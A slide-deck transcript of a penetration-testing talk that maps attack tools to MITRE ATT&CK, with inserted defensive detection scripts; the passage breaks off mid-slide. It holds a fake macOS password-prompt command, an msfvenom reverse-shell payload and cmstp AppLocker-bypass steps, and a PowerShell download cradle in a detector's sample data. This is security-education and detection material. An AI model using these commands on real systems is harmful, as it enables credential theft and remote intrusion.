
Page 1: Weapons of a Pentester - SecTor · 2019. 2. 11. · In 2018 I stumbled upon something truly beautiful 5 2018 Edition of this talk is a special one However, I have slowly realized

Aleks Security Cyber Security Inc. www.AleksSecurity.com

2018 Oct

Understanding the virtual & physical tools used by white/black hat hackers

Weapons of a Pentester

PRESENTER: Nick Aleks

Page 2

Disclaimer

This presentation is intended for professional SECTOR attendees and may contain information, content or opinions that could offend overly sensitive persons.

I will be showcasing and demoing tools that could be used to breach computers, networks, and security controls.

By no means am I endorsing the illegal use of these tools.

No individuals, equipment or animals were harmed while developing this presentation.

The thoughts and opinions within this presentation are my own. I speak for no one, no one speaks for me.

Page 3

Nick Aleks

[email protected]

Penetration Tester

From Toronto

DEFCON Toronto – DC416: https://www.meetup.com/DEFCON416

dc416.com

@Nick_Aleks

Page 4

The History of this Presentation
The right tool – for the right job

Why have I given this talk for 3 years in a row?

- Sharing my knowledge as a pentester
- Meet amazing people in the industry
- Showing off some of the cool toys
- Tango with the demo gods
- Make hackers better

Page 5

2018 Edition of this talk is a special one
In 2018 I stumbled upon something truly beautiful

However, I have slowly realized that this was more than just typically showing off some cool tools and how they may be used in your next engagement.

My previous talks had little to no structure, but this time I wanted to completely reorganize the talk to fit the new trend taking our industry by storm.

The first tool I’ll be showing off to you all is….

Page 6

MITRE ATT&CK Framework

Page 7

Page 8

What is MITRE ATT&CK?
What are we talking about today?

Adversarial Tactics, Techniques & Common Knowledge

A framework that breaks down complex POST-EXPLOIT cyber-attacks into individual units/blocks.

Mapping to MITRE benefits:
- SIEM rules
- EDR detections
- APT threat intelligence
- Map to great pentests ☺

https://attack.mitre.org

(ATT&CK matrix screenshot: Tactics / Techniques … the matrix goes on…)

Page 9

What is MITRE ATT&CK?
What are we talking about today?

Tactics are divided into 11 categories, from Initial Access, Persistence and Lateral Movement to Collection and Exfiltration.

Within each of these Tactics we find a great number of Techniques.

https://attack.mitre.org

Example: Persistence Technique

Page 10

Why map tools to the ATT&CK framework?
What are we talking about today?

5 great reasons:
- Use the right tool for the right job (if you're stuck trying to figure out a way to exfiltrate data)
- Gain a deeper understanding of the tools you already have (stop using your expensive tools for 1 task)
- Compare similar tools and improve PoC testing
- Fine-tune tools and better emulate APTs
- Identify gaps in current tooling capabilities (stuff the industry needs)

MITRE ATT&CK has literally become my north star/map on both the Red and the Blue team side of security.

A great community of infosec professionals has been doing some amazing things with the framework (google it).

I'm working on some amazing non-pentest-engagement-related projects regarding this framework.

So stay tuned.. ☺

Page 11

What is a tool?
What a tool is in regards to this talk

Nick's Definition:

“Something that helps you get the job done and/or teaches you how to get the job done.”

This can include:
- Physical equipment
- Frameworks
- Software
- Mobile apps
- Widgets/Plugins
- Books/Guides
- YouTube videos/Talks
- Websites
- Commands
- Phrases, emails, speaking scripts, personas & clothing (social engineering)

Page 12

Lock picking

Not really mapped to MITRE: “Initial Access” tactic – “Physical Security Compromise”

Page 13

The Art of Picking
How does one pick a lock?

A tension wrench (or torque wrench) is used to apply a torque to the cylinder, while a lock pick (or picklock) is used to push individual pins up until they are flush with the shear line.

Raking or scrubbing a pin tumbler lock is usually done before individual pins are pushed up. While applying torque with the tension wrench, a lock pick with a wide tip is placed at the back of the lock and quickly slid outwards with upward pressure so all the pins are pushed up.

Page 14

Snap gun
The automated lock picking gun

How does it work?

The snap gun strikes all of the bottom pins at once with a strong impact, and then withdraws again. The bottom pins transfer their kinetic energy to the top pins and come to a complete stop without penetrating the lock housing.

How long does it take?

10-30 sec

https://www.sparrowslockpicks.ca/

Page 15

Lock picking gear
A great place to pick up your gear

https://www.sparrowslockpicks.ca/ – catalogue: Dimple Picks, DIY Picks, New Stuff, Blade Magazine Halo Points, Lock Pick Sets (Beginner), Lock Pick Sets (Advanced), Euro Lock Pick Sets, Military Lock Picks, The MONSTRUM, VORAX, Hooks & Rakes lock pick sets, Warded picks and wafer lock picks, Snap Gun, ByPass Drivers, ByPass Tools, Sparrows Jim, Padlock Shims, Practice Locks, Cut Away Locks, UNCUFF LINK cufflink, Handcuff Key, Elevator Key Set, Bump Keys, Lock Busters, Pinning Mat, Pinning Tweezers, Cases, Tension wrenches, Sparrows Lock Pick Reviews, Single Picks

Page 16

Initial Access – Drive-by Compromise Tools (T1189)

Page 17

Browser Exploitation Framework – BeEF
T1189 Drive-by Compromise

BeEF is short for The Browser Exploitation Framework.
- It is a penetration testing tool that focuses on the web browser.
- Simulates web-borne attacks against clients, including mobile clients.
- Client-side attack vectors.
- Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser.

Page 18

How does it work?
T1189 Drive-by Compromise

https://beefproject.com/

BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

Page 19

Other Drive-by Compromise/Webapp Hacking Tools
T1189 honorable mention tools

Tool – Description – URL

Python Webserver – Simple webserver you can host on an attacker machine that will allow you to host a malicious payload that can be downloaded by the victim.
https://docs.python.org/2/library/simplehttpserver.html

Software: XSSer – Cross Site "Scripter" (aka XSSer) is an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications.
https://xsser.03c8.net/

Software: Burp Suite – Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
http://portswigger.net/burp/

Software: DirBuster – DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers.
https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project

Blog: Side-channel attacking browsers through CSS3 features – With the staggering amount of features that were introduced through HTML5 and CSS3, the attack surface of browsers grew accordingly.
https://www.evonide.com/side-channel-attacking-browsers-through-css3-features/

Page 20

Initial Access – Hardware Addition Tools (T1200)

I'm in.

Page 21

T1200 Hardware Addition Tools
What is this little USB?

Computer accessories, computers or networking hardware may be introduced into a system as a vector to gain execution.

While public references of usage by APT groups are scarce, many penetration testers leverage hardware additions for initial access.

Commercial and open source products are leveraged with capabilities such as:
- Passive network tapping
- Man-in-the-middle
- Keystroke injection
- Kernel memory reading
- Wireless access to a network
- And the list goes on…

Page 22

The LAN Turtle
What is this little USB?

The LAN Turtle is a covert systems administration and penetration testing tool.

It is a stealth remote access, network intelligence gathering and man-in-the-middle device. Housed within a generic “USB Ethernet Adapter” case, the LAN Turtle's appearance allows it to blend into many environments.

Drop it on a LAN and access it from anywhere via SSH, Meterpreter and OpenVPN.

Page 23

The Keygrabber Keylogger
What is this little USB device?

Pros:
- Inline hardware-based keystroke recorder
- Plugs into the computer's USB port and the keyboard USB plugs into it (literally plug-n-play)
- 8GB encrypted memory
- Windows/Linux/Mac (no driver)

Cons:
- Requires physical access to retrieve keystroke contents
- Works best on the back of desktop towers/docking stations
- Doesn't really work on laptops

http://www.keelog.com

Page 24

The AirDrive Keylogger
WiFi-enabled keystroke streaming keylogger

Pros:
- WiFi hotspot/device that is easily connected to by the attacking computer
- Plugs into the computer's USB port and the keyboard USB plugs into it (literally plug-n-play)
- Access data from a web browser
- Can send email reports with data
- Time stamping
- Live streaming

Cons:
- Works best on the back of desktop towers/docking stations
- Doesn't really work on laptops

http://www.keelog.com

Page 25

Keylogger Use Cases
Not just to extract passwords

Use cases:
- Profile employee/user behaviour
- List most visited websites/servers/URLs
- Read emails before they are even sent
- Understand business processes and points of contact
- Extract IP (intellectual property)/code/configurations/IP addresses
- Extract chat/IM messages between employees

http://www.keelog.com

Page 26

A great list of hardware addition tools (buy these in bulk)
A list of stuff you should buy in bulk, because you will lose some of them during engagements

Tool – Description – URL

Bash Bunny – USB gigabit Ethernet, serial, flash storage and keyboard emulator – https://www.hak5.org/shows/hak5-gear

USB Rubber Ducky – Keystroke injection tool disguised as a generic flash drive – https://www.hak5.org/shows/hak5-gear

Packet Squirrel – Stealthy pocket-sized network man-in-the-middle device – https://www.hak5.org/shows/hak5-gear

LAN Turtle – USB Ethernet adapter backdoor and man-in-the-middle device – https://www.hak5.org/shows/hak5-gear

Keygrabber USB – In-line keylogger (keyboard keystroke recorder) – http://www.keelog.com/usb-keylogger/

Raspberry Pi 3 Model B+ – 64-bit quad-core processor, dual-band wireless LAN, Bluetooth 4.2/BLE, faster Ethernet, and Power-over-Ethernet mini-computer – https://www.raspberrypi.org

Arduino Uno Rev3/Nano (distraction/covert operations) – Programmable microcontroller board. It has 14 digital input/output pins (of which 6 can be used as PWM outputs) and 6 analog inputs – https://store.arduino.cc/usa/arduino-uno-rev3

Page 27

Initial Access – Spear-phishing Attachment/Link Tools (T1192/T1193)

Page 28

Social Engineering Toolkit (SET)
T1192/T1193 Spear-phishing Attachment/Link

Spear-phishing attack vector option built into SET.

SET allows you to craft an attack, integrate with a mail provider (Gmail) and send a malicious payload (PDF) to the victim.

Allows you to create and save your own templates to use for future SE (Social Engineering) attacks.

As easy as following the SET menu, or you can go ahead and create your own FileFormat payload.

https://github.com/trustedsec/social-engineer-toolkit

Page 29

Phishing Dark Waters
Blue team books help drive red team ideas

When it comes to spear-phishing your targets, it's great to have examples of known attacks.

Books like Phishing Dark Waters allow you to pick and choose the types of elements within a phishing campaign to include or not include.

There is a massive number of clues/hints employees have been trained to look out for before clicking links/attachments within emails.

Be sure to hold your spear-phish to a quality assurance test by measuring it against commonly known indicators of suspicious email.

Have a teammate or third party review your spear-phish email before delivering it in order to remove any personal bias and human/logic errors.

Page 30

T1194 – Spearphishing via Service Tools
How are they different?

• Spearphishing isn't just about clicking links or downloading attachments

• Spearphishing via service is a specific variant of spearphishing.

• It employs the use of third party services rather than directly via enterprise email channels.

• All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry.

• Adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.

• These services are more likely to have a less-strict security policy than an enterprise.

• Some of my fav tools combine the elements of social engineering & scripting/tech & hardware tooling

Page 31

T1194 – Spearphishing via WiFi – Wifiphisher
T1194 – Spearphishing via Service Tool

GitHub: https://github.com/sophron/wifiphisher

Wifiphisher is a security tool that mounts automated phishing attacks against WiFi networks in order to obtain secret passphrases or other credentials. It is a social engineering attack that, unlike other methods, does not include any brute forcing.

Step 1: Victim becomes deauthenticated from their access point.

Step 2: Victim joins a rogue access point.

Step 3: Victim is served a realistic router-config-looking page.

Step 4: Victim types password.
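A defender-side check for Step 1, as an added example that is not part of the talk or of Wifiphisher: a sliding-window detector that flags any station hit by a burst of deauthentication frames, run over a constructed list of simplified 802.11 frame records. The Frame layout, thresholds and sample MAC addresses are assumptions; map your wireless IDS or monitor-mode capture fields onto them.

```python
"""Detecting the deauthentication burst that precedes a rogue-AP phish (Step 1).

Added example, not Wifiphisher code. Input is a constructed list of simplified
802.11 frame records such as a wireless IDS or a monitor-mode capture could
export; the Frame layout is an assumption.
"""
from collections import defaultdict, deque
from dataclasses import dataclass

# IEEE 802.11 management-frame subtypes (frame type 0 = management).
DISASSOC_SUBTYPE = 10
DEAUTH_SUBTYPE = 12
BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass(frozen=True)
class Frame:
    ts: float      # capture timestamp, seconds
    ftype: int     # 0 = management, 1 = control, 2 = data
    subtype: int
    src: str       # transmitter MAC
    dst: str       # receiver MAC


def detect_deauth_flood(frames, window=2.0, threshold=10):
    """Return {station_mac: timestamp} for every station that received more
    than `threshold` deauth/disassoc frames inside any `window`-second span.

    One deque of timestamps per receiving station keeps memory bounded.
    A broadcast deauth kicks every associated client at once, so it is
    counted against every non-broadcast station seen so far except the sender.
    """
    recent = defaultdict(deque)
    known_stations = set()
    alerts = {}
    for f in sorted(frames, key=lambda x: x.ts):
        for addr in (f.src, f.dst):
            if addr != BROADCAST:
                known_stations.add(addr)
        if f.ftype != 0 or f.subtype not in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE):
            continue
        targets = known_stations - {f.src} if f.dst == BROADCAST else {f.dst}
        for sta in targets:
            q = recent[sta]
            q.append(f.ts)
            while f.ts - q[0] > window:      # drop timestamps outside the window
                q.popleft()
            if len(q) > threshold and sta not in alerts:
                alerts[sta] = f.ts
    return alerts


def sample_capture():
    """Constructed sample: two clients associate normally, one lone deauth
    (an AP reboot, say) and then a 1-second burst of 20 deauths spoofed
    from the AP's address at a single victim, the pattern Step 1 produces."""
    ap, victim, other = "aa:aa:aa:aa:aa:01", "bb:bb:bb:bb:bb:02", "cc:cc:cc:cc:cc:03"
    frames = [Frame(0.0, 2, 0, victim, ap), Frame(0.1, 2, 0, other, ap)]
    frames.append(Frame(5.0, 0, DEAUTH_SUBTYPE, ap, other))
    frames += [Frame(10.0 + i / 20, 0, DEAUTH_SUBTYPE, ap, victim) for i in range(20)]
    return frames


if __name__ == "__main__":
    for sta, ts in detect_deauth_flood(sample_capture()).items():
        print(f"deauth flood against {sta} at t={ts:.2f}s")
```

A single deauth, as an access point sends when it reboots, stays below the threshold; only the burst trips the alert, and a broadcast burst alerts on every client the capture has seen.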

Page 32

The Requirements – 2x wireless cards
How can we start playing with Wifiphisher?

✓ Kali Linux

✓ Two wireless network cards,

✓ Capable of injection/monitor mode

Needs TP-LINK TL-WN722N

✓ 150 Mbps

✓ 4dBi detachable antenna

✓ $12 on amazon

Page 33

Wifiphisher – How it works
Take a look at Wifiphisher

Page 34

Jamming Interface

Page 35

Router firmware upgrade

WPA2 Enterprise - Add a new form input (username)

Page 36

Free Internet!

Page 37

Mac OSX Wireless Networking Connection Spoofing

Page 38

Spearphishing Tools
T1192/T1193 Spearphishing Attachment/Link Tools

Tool – Description – URL

Social Engineering Toolkit Manual – SET User Manual 6.0 by David Kennedy – https://github.com/trustedsec/social-engineer-toolkit

Phishing Dark Waters: The Offensive and Defensive Sides of Malicious Emails – An essential anti-phishing desk reference for anyone with an email address. Phishing Dark Waters addresses the growing and continuing scourge of phishing emails, and provides actionable defensive techniques and tools to help you steer clear of malicious emails.
https://www.amazon.ca/Phishing-Dark-Waters-Offensive-Defensive/dp/1118958470

Spear-Phishing With the Social Engineering Toolkit Tutorial – A tutorial outlining how to create a spear-phishing attack and send a malicious file through an email using SET.
https://www.youtube.com/watch?v=5BY_vYOik_U

Wifiphisher GitHub Repo – Wifiphisher is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing. Using Wifiphisher, penetration testers can easily achieve a man-in-the-middle position against wireless clients by performing targeted Wi-Fi association attacks.
https://github.com/wifiphisher/wifiphisher

Page 39

Execution – AppleScript (T1155)

Page 40

T1155 – AppleScript
Execution on Mac OSX computers via AppleScript

• macOS and OS X applications send AppleEvent messages to each other for interprocess communication (IPC).

• These messages can be easily scripted with AppleScript for local or remote IPC.

• osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts.

• A list of OSA languages installed on a system can be found by using the osalang program.

• AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.

• Adversaries can use this to interact with:

– open SSH connections

– move to remote machines

– present users with fake dialog boxes

Page 41

T1155 – AppleScript Example
Execution on Mac OSX computers via AppleScript

A simple AppleScript Open Scripting Architecture (OSA) command that will prompt the user for a password in order to upgrade their current Mac Operating System. The password is returned in plain text to stdout.

osascript -e 'display dialog "Required System Upgrade. Please enter passphrase." default answer "" with icon stop buttons {"Continue"} default button "Continue" with hidden answer'
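The detection-side counterpart to the one-liner above, as an added example that is not from the talk: it scans process-start records for osascript invocations that display a dialog with a hidden (password-style) answer field, which is exactly the signature of this prompt. The ProcEvent layout and the sample records are constructed assumptions; map your EDR's process-start fields onto them.

```python
"""Flagging osascript credential prompts in process-execution telemetry (T1155).

Added example, not from the talk. The ProcEvent layout and SAMPLE_EVENTS
are constructed; record 502 mirrors the slide's one-liner.
"""
import re
import shlex
from dataclasses import dataclass

# AppleScript: display dialog "<text>" ... [default answer ""] [with hidden answer]
DIALOG_RE = re.compile(r'display\s+dialog\s+"((?:[^"\\]|\\.)*)"', re.IGNORECASE)
HIDDEN_RE = re.compile(r"\bwith\s+hidden\s+answer\b", re.IGNORECASE)
SECRET_WORDS_RE = re.compile(r"\b(pass(word|phrase|code)?|credential|pin)\b", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    parent: str      # parent process name
    cmdline: str     # full command line as logged


@dataclass(frozen=True)
class Finding:
    pid: int
    parent: str
    prompt_text: str
    hidden_answer: bool
    severity: str


def osascript_script(cmdline):
    """Return the AppleScript text passed via -e flags, or "" if the command
    is not osascript (or the command line cannot be tokenised)."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return ""
    if not argv or argv[0].rsplit("/", 1)[-1] != "osascript":
        return ""
    return "\n".join(argv[i + 1] for i, a in enumerate(argv[:-1]) if a == "-e")


def scan_events(events):
    """Return one Finding per osascript invocation that displays a dialog.

    A dialog with a hidden answer field is a password prompt by construction
    and is rated high; a visible-answer dialog whose text asks for a secret
    is rated medium; any other dialog is low (still worth a look when the
    parent is a non-interactive process such as python3 or curl)."""
    findings = []
    for ev in events:
        script = osascript_script(ev.cmdline)
        m = DIALOG_RE.search(script)
        if not m:
            continue
        text = m.group(1)
        hidden = HIDDEN_RE.search(script) is not None
        if hidden:
            sev = "high"
        elif SECRET_WORDS_RE.search(text):
            sev = "medium"
        else:
            sev = "low"
        findings.append(Finding(ev.pid, ev.parent, text, hidden, sev))
    return findings


SAMPLE_EVENTS = [  # constructed records
    ProcEvent(501, "Terminal", """osascript -e 'tell application "Finder" to get name of every window'"""),
    ProcEvent(502, "python3", """osascript -e 'display dialog "Required System Upgrade. Please enter passphrase." default answer "" with icon stop buttons {"Continue"} default button "Continue" with hidden answer'"""),
    ProcEvent(503, "Script Editor", """osascript -e 'display dialog "Backup finished" buttons {"OK"}'"""),
    ProcEvent(504, "bash", "/bin/ls -la"),
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[{f.severity}] pid={f.pid} parent={f.parent} hidden={f.hidden_answer} text={f.prompt_text!r}")
```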

Page 42

AppleScript Tools
T1155 AppleScript Tools

Tool – Description – URL

Attack Mac OSX – Dan Tentler gave a talk at LayerOne 2016 – https://www.youtube.com/watch?v=buvhi77_MI4

Password Prompt – A simple AppleScript that will prompt the user for a password in order to upgrade their current Mac Operating System. Password is returned in plain text to stdout.
https://gist.github.com/nicholasaleks/c272c2630791e612eca6bbf013b5bbf4

Learn AppleScript: The Comprehensive Guide to Scripting and Automation on Mac OS X, Edition 3 – https://goo.gl/DpaUUa

AppleScript in a Nutshell: A Desktop Quick Reference – https://goo.gl/GG5LVD

Page 43

Execution – CMSTP (T1191)

Page 44

T1191 CMSTP Tools
LOLBAS – Living Off the Land Binaries and Scripts

Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles.

Trusted built-in Windows binary.

Not only an execution tactic but also:
- Defence evasion
- Persistence

It accepts an installation file (INF) and installs a service profile leveraged for remote access connections.

Adversaries may supply CMSTP.exe with infected INF files to load and execute DLLs and/or COM scriptlets (SCT).

Page 45

T1191 CMSTP
Let's bypass AppLocker! Example by netbiosX (pentestlab.blog)

Good tutorial on using CMSTP to bypass AppLocker:

1. Generate DLL: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.2 LPORT=4444 -f dll -o /root/Desktop/pentestlab.dll

2. Generate malicious INF file which references your DLL

3. Execute: cmstp.exe /s cmstp.inf

https://pentestlab.blog/2018/05/10/applocker-bypass-cmstp/
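The detection view of the same procedure, as an added example that is not from the talk or the pentestlab post: two checks over process-creation records shaped like Sysmon Event ID 1 fields (Image, CommandLine, ParentImage), flagging a cmstp.exe run whose INF sits outside trusted directories (noting any quiet switches such as /s) and any child process of cmstp.exe. The trusted-directory list and every sample path are constructed assumptions.

```python
"""Detection logic for suspicious CMSTP.exe use (T1191).

Added example, not from the talk or the blog it cites. Records are shaped
like Sysmon Event ID 1 fields; the trusted-directory list and every sample
path below are constructed assumptions to tune for your environment.
"""
import re
from dataclasses import dataclass

# Switches from the cmstp.exe documentation cited on the next slide.
SWITCHES = {"/nf", "/ni", "/ns", "/s", "/su", "/u"}
QUIET = {"/s", "/ni", "/nf"}        # suppress UI / icon / file-copy prompts
# Assumed locations a legitimately deployed Connection Manager profile comes from.
TRUSTED_INF_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")


@dataclass(frozen=True)
class ProcStart:
    image: str          # full path of the started process
    command_line: str
    parent_image: str


def is_cmstp(image):
    return image.lower().rsplit("\\", 1)[-1] == "cmstp.exe"


def parse_cmstp_cmdline(cmdline):
    """Split a cmstp command line into (set of known switches, INF path or None)."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    switches = {t.lower() for t in tokens[1:] if t.lower() in SWITCHES}
    infs = [t for t in tokens[1:] if t.lower().endswith(".inf")]
    return switches, (infs[0] if infs else None)


def classify(ev):
    """Return the reasons this record is suspicious (empty list = benign)."""
    reasons = []
    if is_cmstp(ev.parent_image):
        # A profile install has no business launching other programs.
        reasons.append(f"child process of cmstp.exe: {ev.image}")
    if is_cmstp(ev.image):
        switches, inf = parse_cmstp_cmdline(ev.command_line)
        if inf is not None and not inf.lower().startswith(TRUSTED_INF_DIRS):
            quiet = " ".join(sorted(switches & QUIET)) or "no quiet switches"
            reasons.append(f"INF outside trusted dirs ({quiet}): {inf}")
    return reasons


SAMPLE_EVENTS = [  # constructed; the first mirrors step 3 on this slide
    ProcStart(r"C:\Windows\System32\cmstp.exe",
              r'cmstp.exe /s "C:\Users\bob\AppData\Local\Temp\cmstp.inf"',
              r"C:\Windows\System32\cmd.exe"),
    ProcStart(r"C:\Users\bob\AppData\Local\Temp\updater.exe",
              r'"C:\Users\bob\AppData\Local\Temp\updater.exe"',
              r"C:\Windows\System32\cmstp.exe"),
    ProcStart(r"C:\Windows\System32\cmstp.exe",
              r'cmstp.exe /ni /s "C:\Program Files\Contoso VPN\contoso.inf"',
              r"C:\Program Files\Contoso VPN\setup.exe"),
    ProcStart(r"C:\Windows\System32\notepad.exe", "notepad.exe", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for reason in classify(ev):
            print(f"ALERT {ev.image}: {reason}")
```

The third record, a silent install from a vendor's Program Files directory, is the legitimate case the trusted-directory list exists for; the same switches with an INF in a user's Temp directory are what the slide's step 3 looks like in telemetry.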

Page 46

CMSTP Tools
T1191 CMSTP Tools

Tool – Description – URL

Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 1/2) – Blog articles outlining how to create a malicious DLL and INF and execute cmstp.exe.
https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/

AppLocker Bypass – CMSTP – Blog article outlining how to create a malicious DLL and INF and execute cmstp.exe.
https://pentestlab.blog/2018/05/10/applocker-bypass-cmstp/

CMSTP Microsoft Doc – Windows IT Pro Center documentation: cmstp.exe [/nf] [/ni] [/ns] [/s] [/su] [/u] [Drive:][path]ServiceProfileFileName.inf
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp

CMSTP.exe – remote SCT execution video – Nicky Tyrer, Jan 30, 2018: CMSTP.exe (Microsoft Connection Manager Profile Installer) can invoke DllInstall from scrobj.dll. Therefore remote COM scriptlets can be executed.
https://www.youtube.com/watch?v=gzBBdoKv0OM

Page 47

Execution – PowerShell Tools (T1086)

Page 48

T1086 – Empire
PowerShell/Python Post-exploitation Framework

• Empire is a post-exploitation framework that includes:
  – PowerShell 2.0 Windows agent
  – Python 2.6/2.7 Linux/OS X agent
• The framework is similar to Metasploit; however, it has a dedicated focus on Windows targets
• Great tool for not only execution but persistence and privilege escalation techniques
• 3 main components:
  – A listener is a process which listens for a connection from the machine we are attacking. This helps Empire send the loot back to the attacker's computer.
  – A stager is a snippet of code that allows malicious code to be run via the agent on the compromised host.
  – An agent is a program that maintains a connection between your computer and the compromised host.
• Check out Empire and learn more at: https://github.com/EmpireProject/Empire/wiki/Quickstart

Page 49

T1086 – PowerSploit
PowerShell Tool

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following script categories:

• CodeExecution

• ScriptModification

• Persistence

• AntivirusBypass

• Exfiltration

• Mayhem

• Privesc

• Recon

https://github.com/PowerShellMafia/PowerSploit

Page 50

T1086 – Atomic Red Team
PowerShell-based attacks

A great tool not only for executing PowerShell attacks but also other MITRE ATT&CK techniques.

Pros:

- Simple one-liner attacks

- Fairly good coverage (not 100%)

- Easy to use

- Good community support/contribution

Cons:

- No built in validation or clean up scripts

Page 51

T1086 PowerShell Tools

Tool / Description / URL

Fileless PowerShell Attack
  Description: A brief demonstration of Cybereason blocking a fileless PowerShell-based attack
  URL: https://www.youtube.com/watch?v=Hc7h-rIyd5A

Windows PowerShell Cookbook
  Description: The Complete Guide to Scripting Microsoft's Command Shell
  URL: https://goo.gl/qnYpPb

Byt3bl33d3r Blog (byte bleeder)
  Description: Great blog that posts on Python scripted tools from the byt3bl33d3r GitHub repo
  URL: https://byt3bl33d3r.github.io/automating-the-empire-with-the-death-star-getting-domain-admin-with-a-push-of-a-button.html

Atomic Red Team T1086 – PowerShell Attacks
  Description: Atomic Red Team is a library of simple tests that every security team can execute to test their controls. Tests are focused, have few dependencies, and are defined in a structured format that can be used by automation frameworks.
  URL: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1086/T1086.md

PSAttack
  Description: A portable console aimed at making pentesting with PowerShell a little easier.
  URL: https://github.com/jaredhaight/PSAttack
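The T1086 slides above (Empire, PowerSploit, Atomic Red Team and the tool table) all lean on the same handful of PowerShell launch patterns: hidden or no-profile launch flags, an -EncodedCommand payload, a download cradle, and Invoke-Expression. The blue-team counterpart is to look for those patterns in script block logging. The following is an added example, not code from the talk or from any of the listed projects: it triages constructed script block log entries (the text field of Windows Event ID 4104), decodes the -EncodedCommand payload so the cradle hidden inside it is visible, and alerts only when several indicators co-occur, since any single one is common in legitimate administration. The event records, the URL (example.invalid) and the two-indicator threshold are assumptions made for this example.

```python
"""Added example (not from the talk): triage PowerShell script block log text
for the launch patterns T1086 tooling relies on. All events are constructed."""
import base64
import re

# Base64 blob following -e / -enc / -EncodedCommand (captured for decoding).
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)

# Indicator categories. Each one alone shows up in legitimate admin scripts,
# so triage() alerts only when at least `min_hits` categories co-occur.
INDICATORS = {
    "stealth_flags": re.compile(
        r"(-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b|-noni(?:nteractive)?\b"
        r"|-e(?:p|xec|xecutionpolicy)?\s+bypass)", re.I),
    "encoded_command": ENCODED_RE,
    "download_cradle": re.compile(
        r"(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b)", re.I),
    "dynamic_eval": re.compile(r"(Invoke-Expression|\biex\b)", re.I),
    "base64_payload": re.compile(r"FromBase64String", re.I),
}


def decode_encoded_command(text):
    """Return the plaintext behind -EncodedCommand (UTF-16LE base64), or None."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def indicator_hits(text):
    """Return (sorted list of matched categories, decoded payload or None).

    The decoded payload is scanned together with the raw text, so a cradle that
    only exists inside the base64 blob still counts."""
    decoded = decode_encoded_command(text)
    haystack = text if decoded is None else text + "\n" + decoded
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    return hits, decoded


def triage(events, min_hits=2):
    """Return findings for events matching at least `min_hits` categories."""
    findings = []
    for ev in events:
        hits, decoded = indicator_hits(ev["ScriptBlockText"])
        if len(hits) >= min_hits:
            findings.append({"id": ev["id"], "hits": hits, "decoded": decoded})
    return findings


# Constructed sample: the cradle is encoded here exactly as PowerShell expects
# for -EncodedCommand (UTF-16LE, then base64). example.invalid is a placeholder.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"id": 1, "ScriptBlockText": "Get-ChildItem C:\\Users | Sort-Object Length"},
    # Legitimate use of base64: one weak indicator, must not alert on its own.
    {"id": 2, "ScriptBlockText": "$bytes = [Convert]::FromBase64String($certBlob); "
                                 "Set-Content -Path cert.der -Value $bytes -Encoding Byte"},
    {"id": 3, "ScriptBlockText": "powershell.exe -NoP -W Hidden -Exec Bypass -Enc " + ENCODED},
    {"id": 4, "ScriptBlockText": "Get-Process | Where-Object { $_.CPU -gt 100 }"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"event {f['id']}: {', '.join(f['hits'])}")
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

Feeding real 4104 events requires script block logging to be enabled, and the regexes should be treated as a starting point: obfuscation tooling breaks the literal strings, which is exactly why the Atomic Red Team tests are useful for checking whether a given detection still fires.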

Page 52

Discovery: System Network Connections Discovery (T1049)

Page 53

T1049 - G-MoN (Wireless Network Mapping Application)

Powerful WarDriving scanner and GSM / CDMA / EVDO / UMTS and LTE Netmonitor and drive test tool with voice notifications.

It scans for all WiFi networks in range and saves the data with GPS coordinates into a file on your SD card.

You can create a KML file for Google Earth. It shows you the encryption, channel and signal strength. It shows all APs in range on a live map.

https://play.google.com/store/apps/details?id=de.carknue.gmon2&hl=en

Pages 54-56

T1049 - G-MoN (Wireless Network Mapping Application), continued

Page 57

NooElec NESDR Mini USB RTL-SDR (SDR = Software Defined Radio)

What is it?

USB software defined radio. Used to listen to radio frequencies and display their output on your computer.

Capabilities?

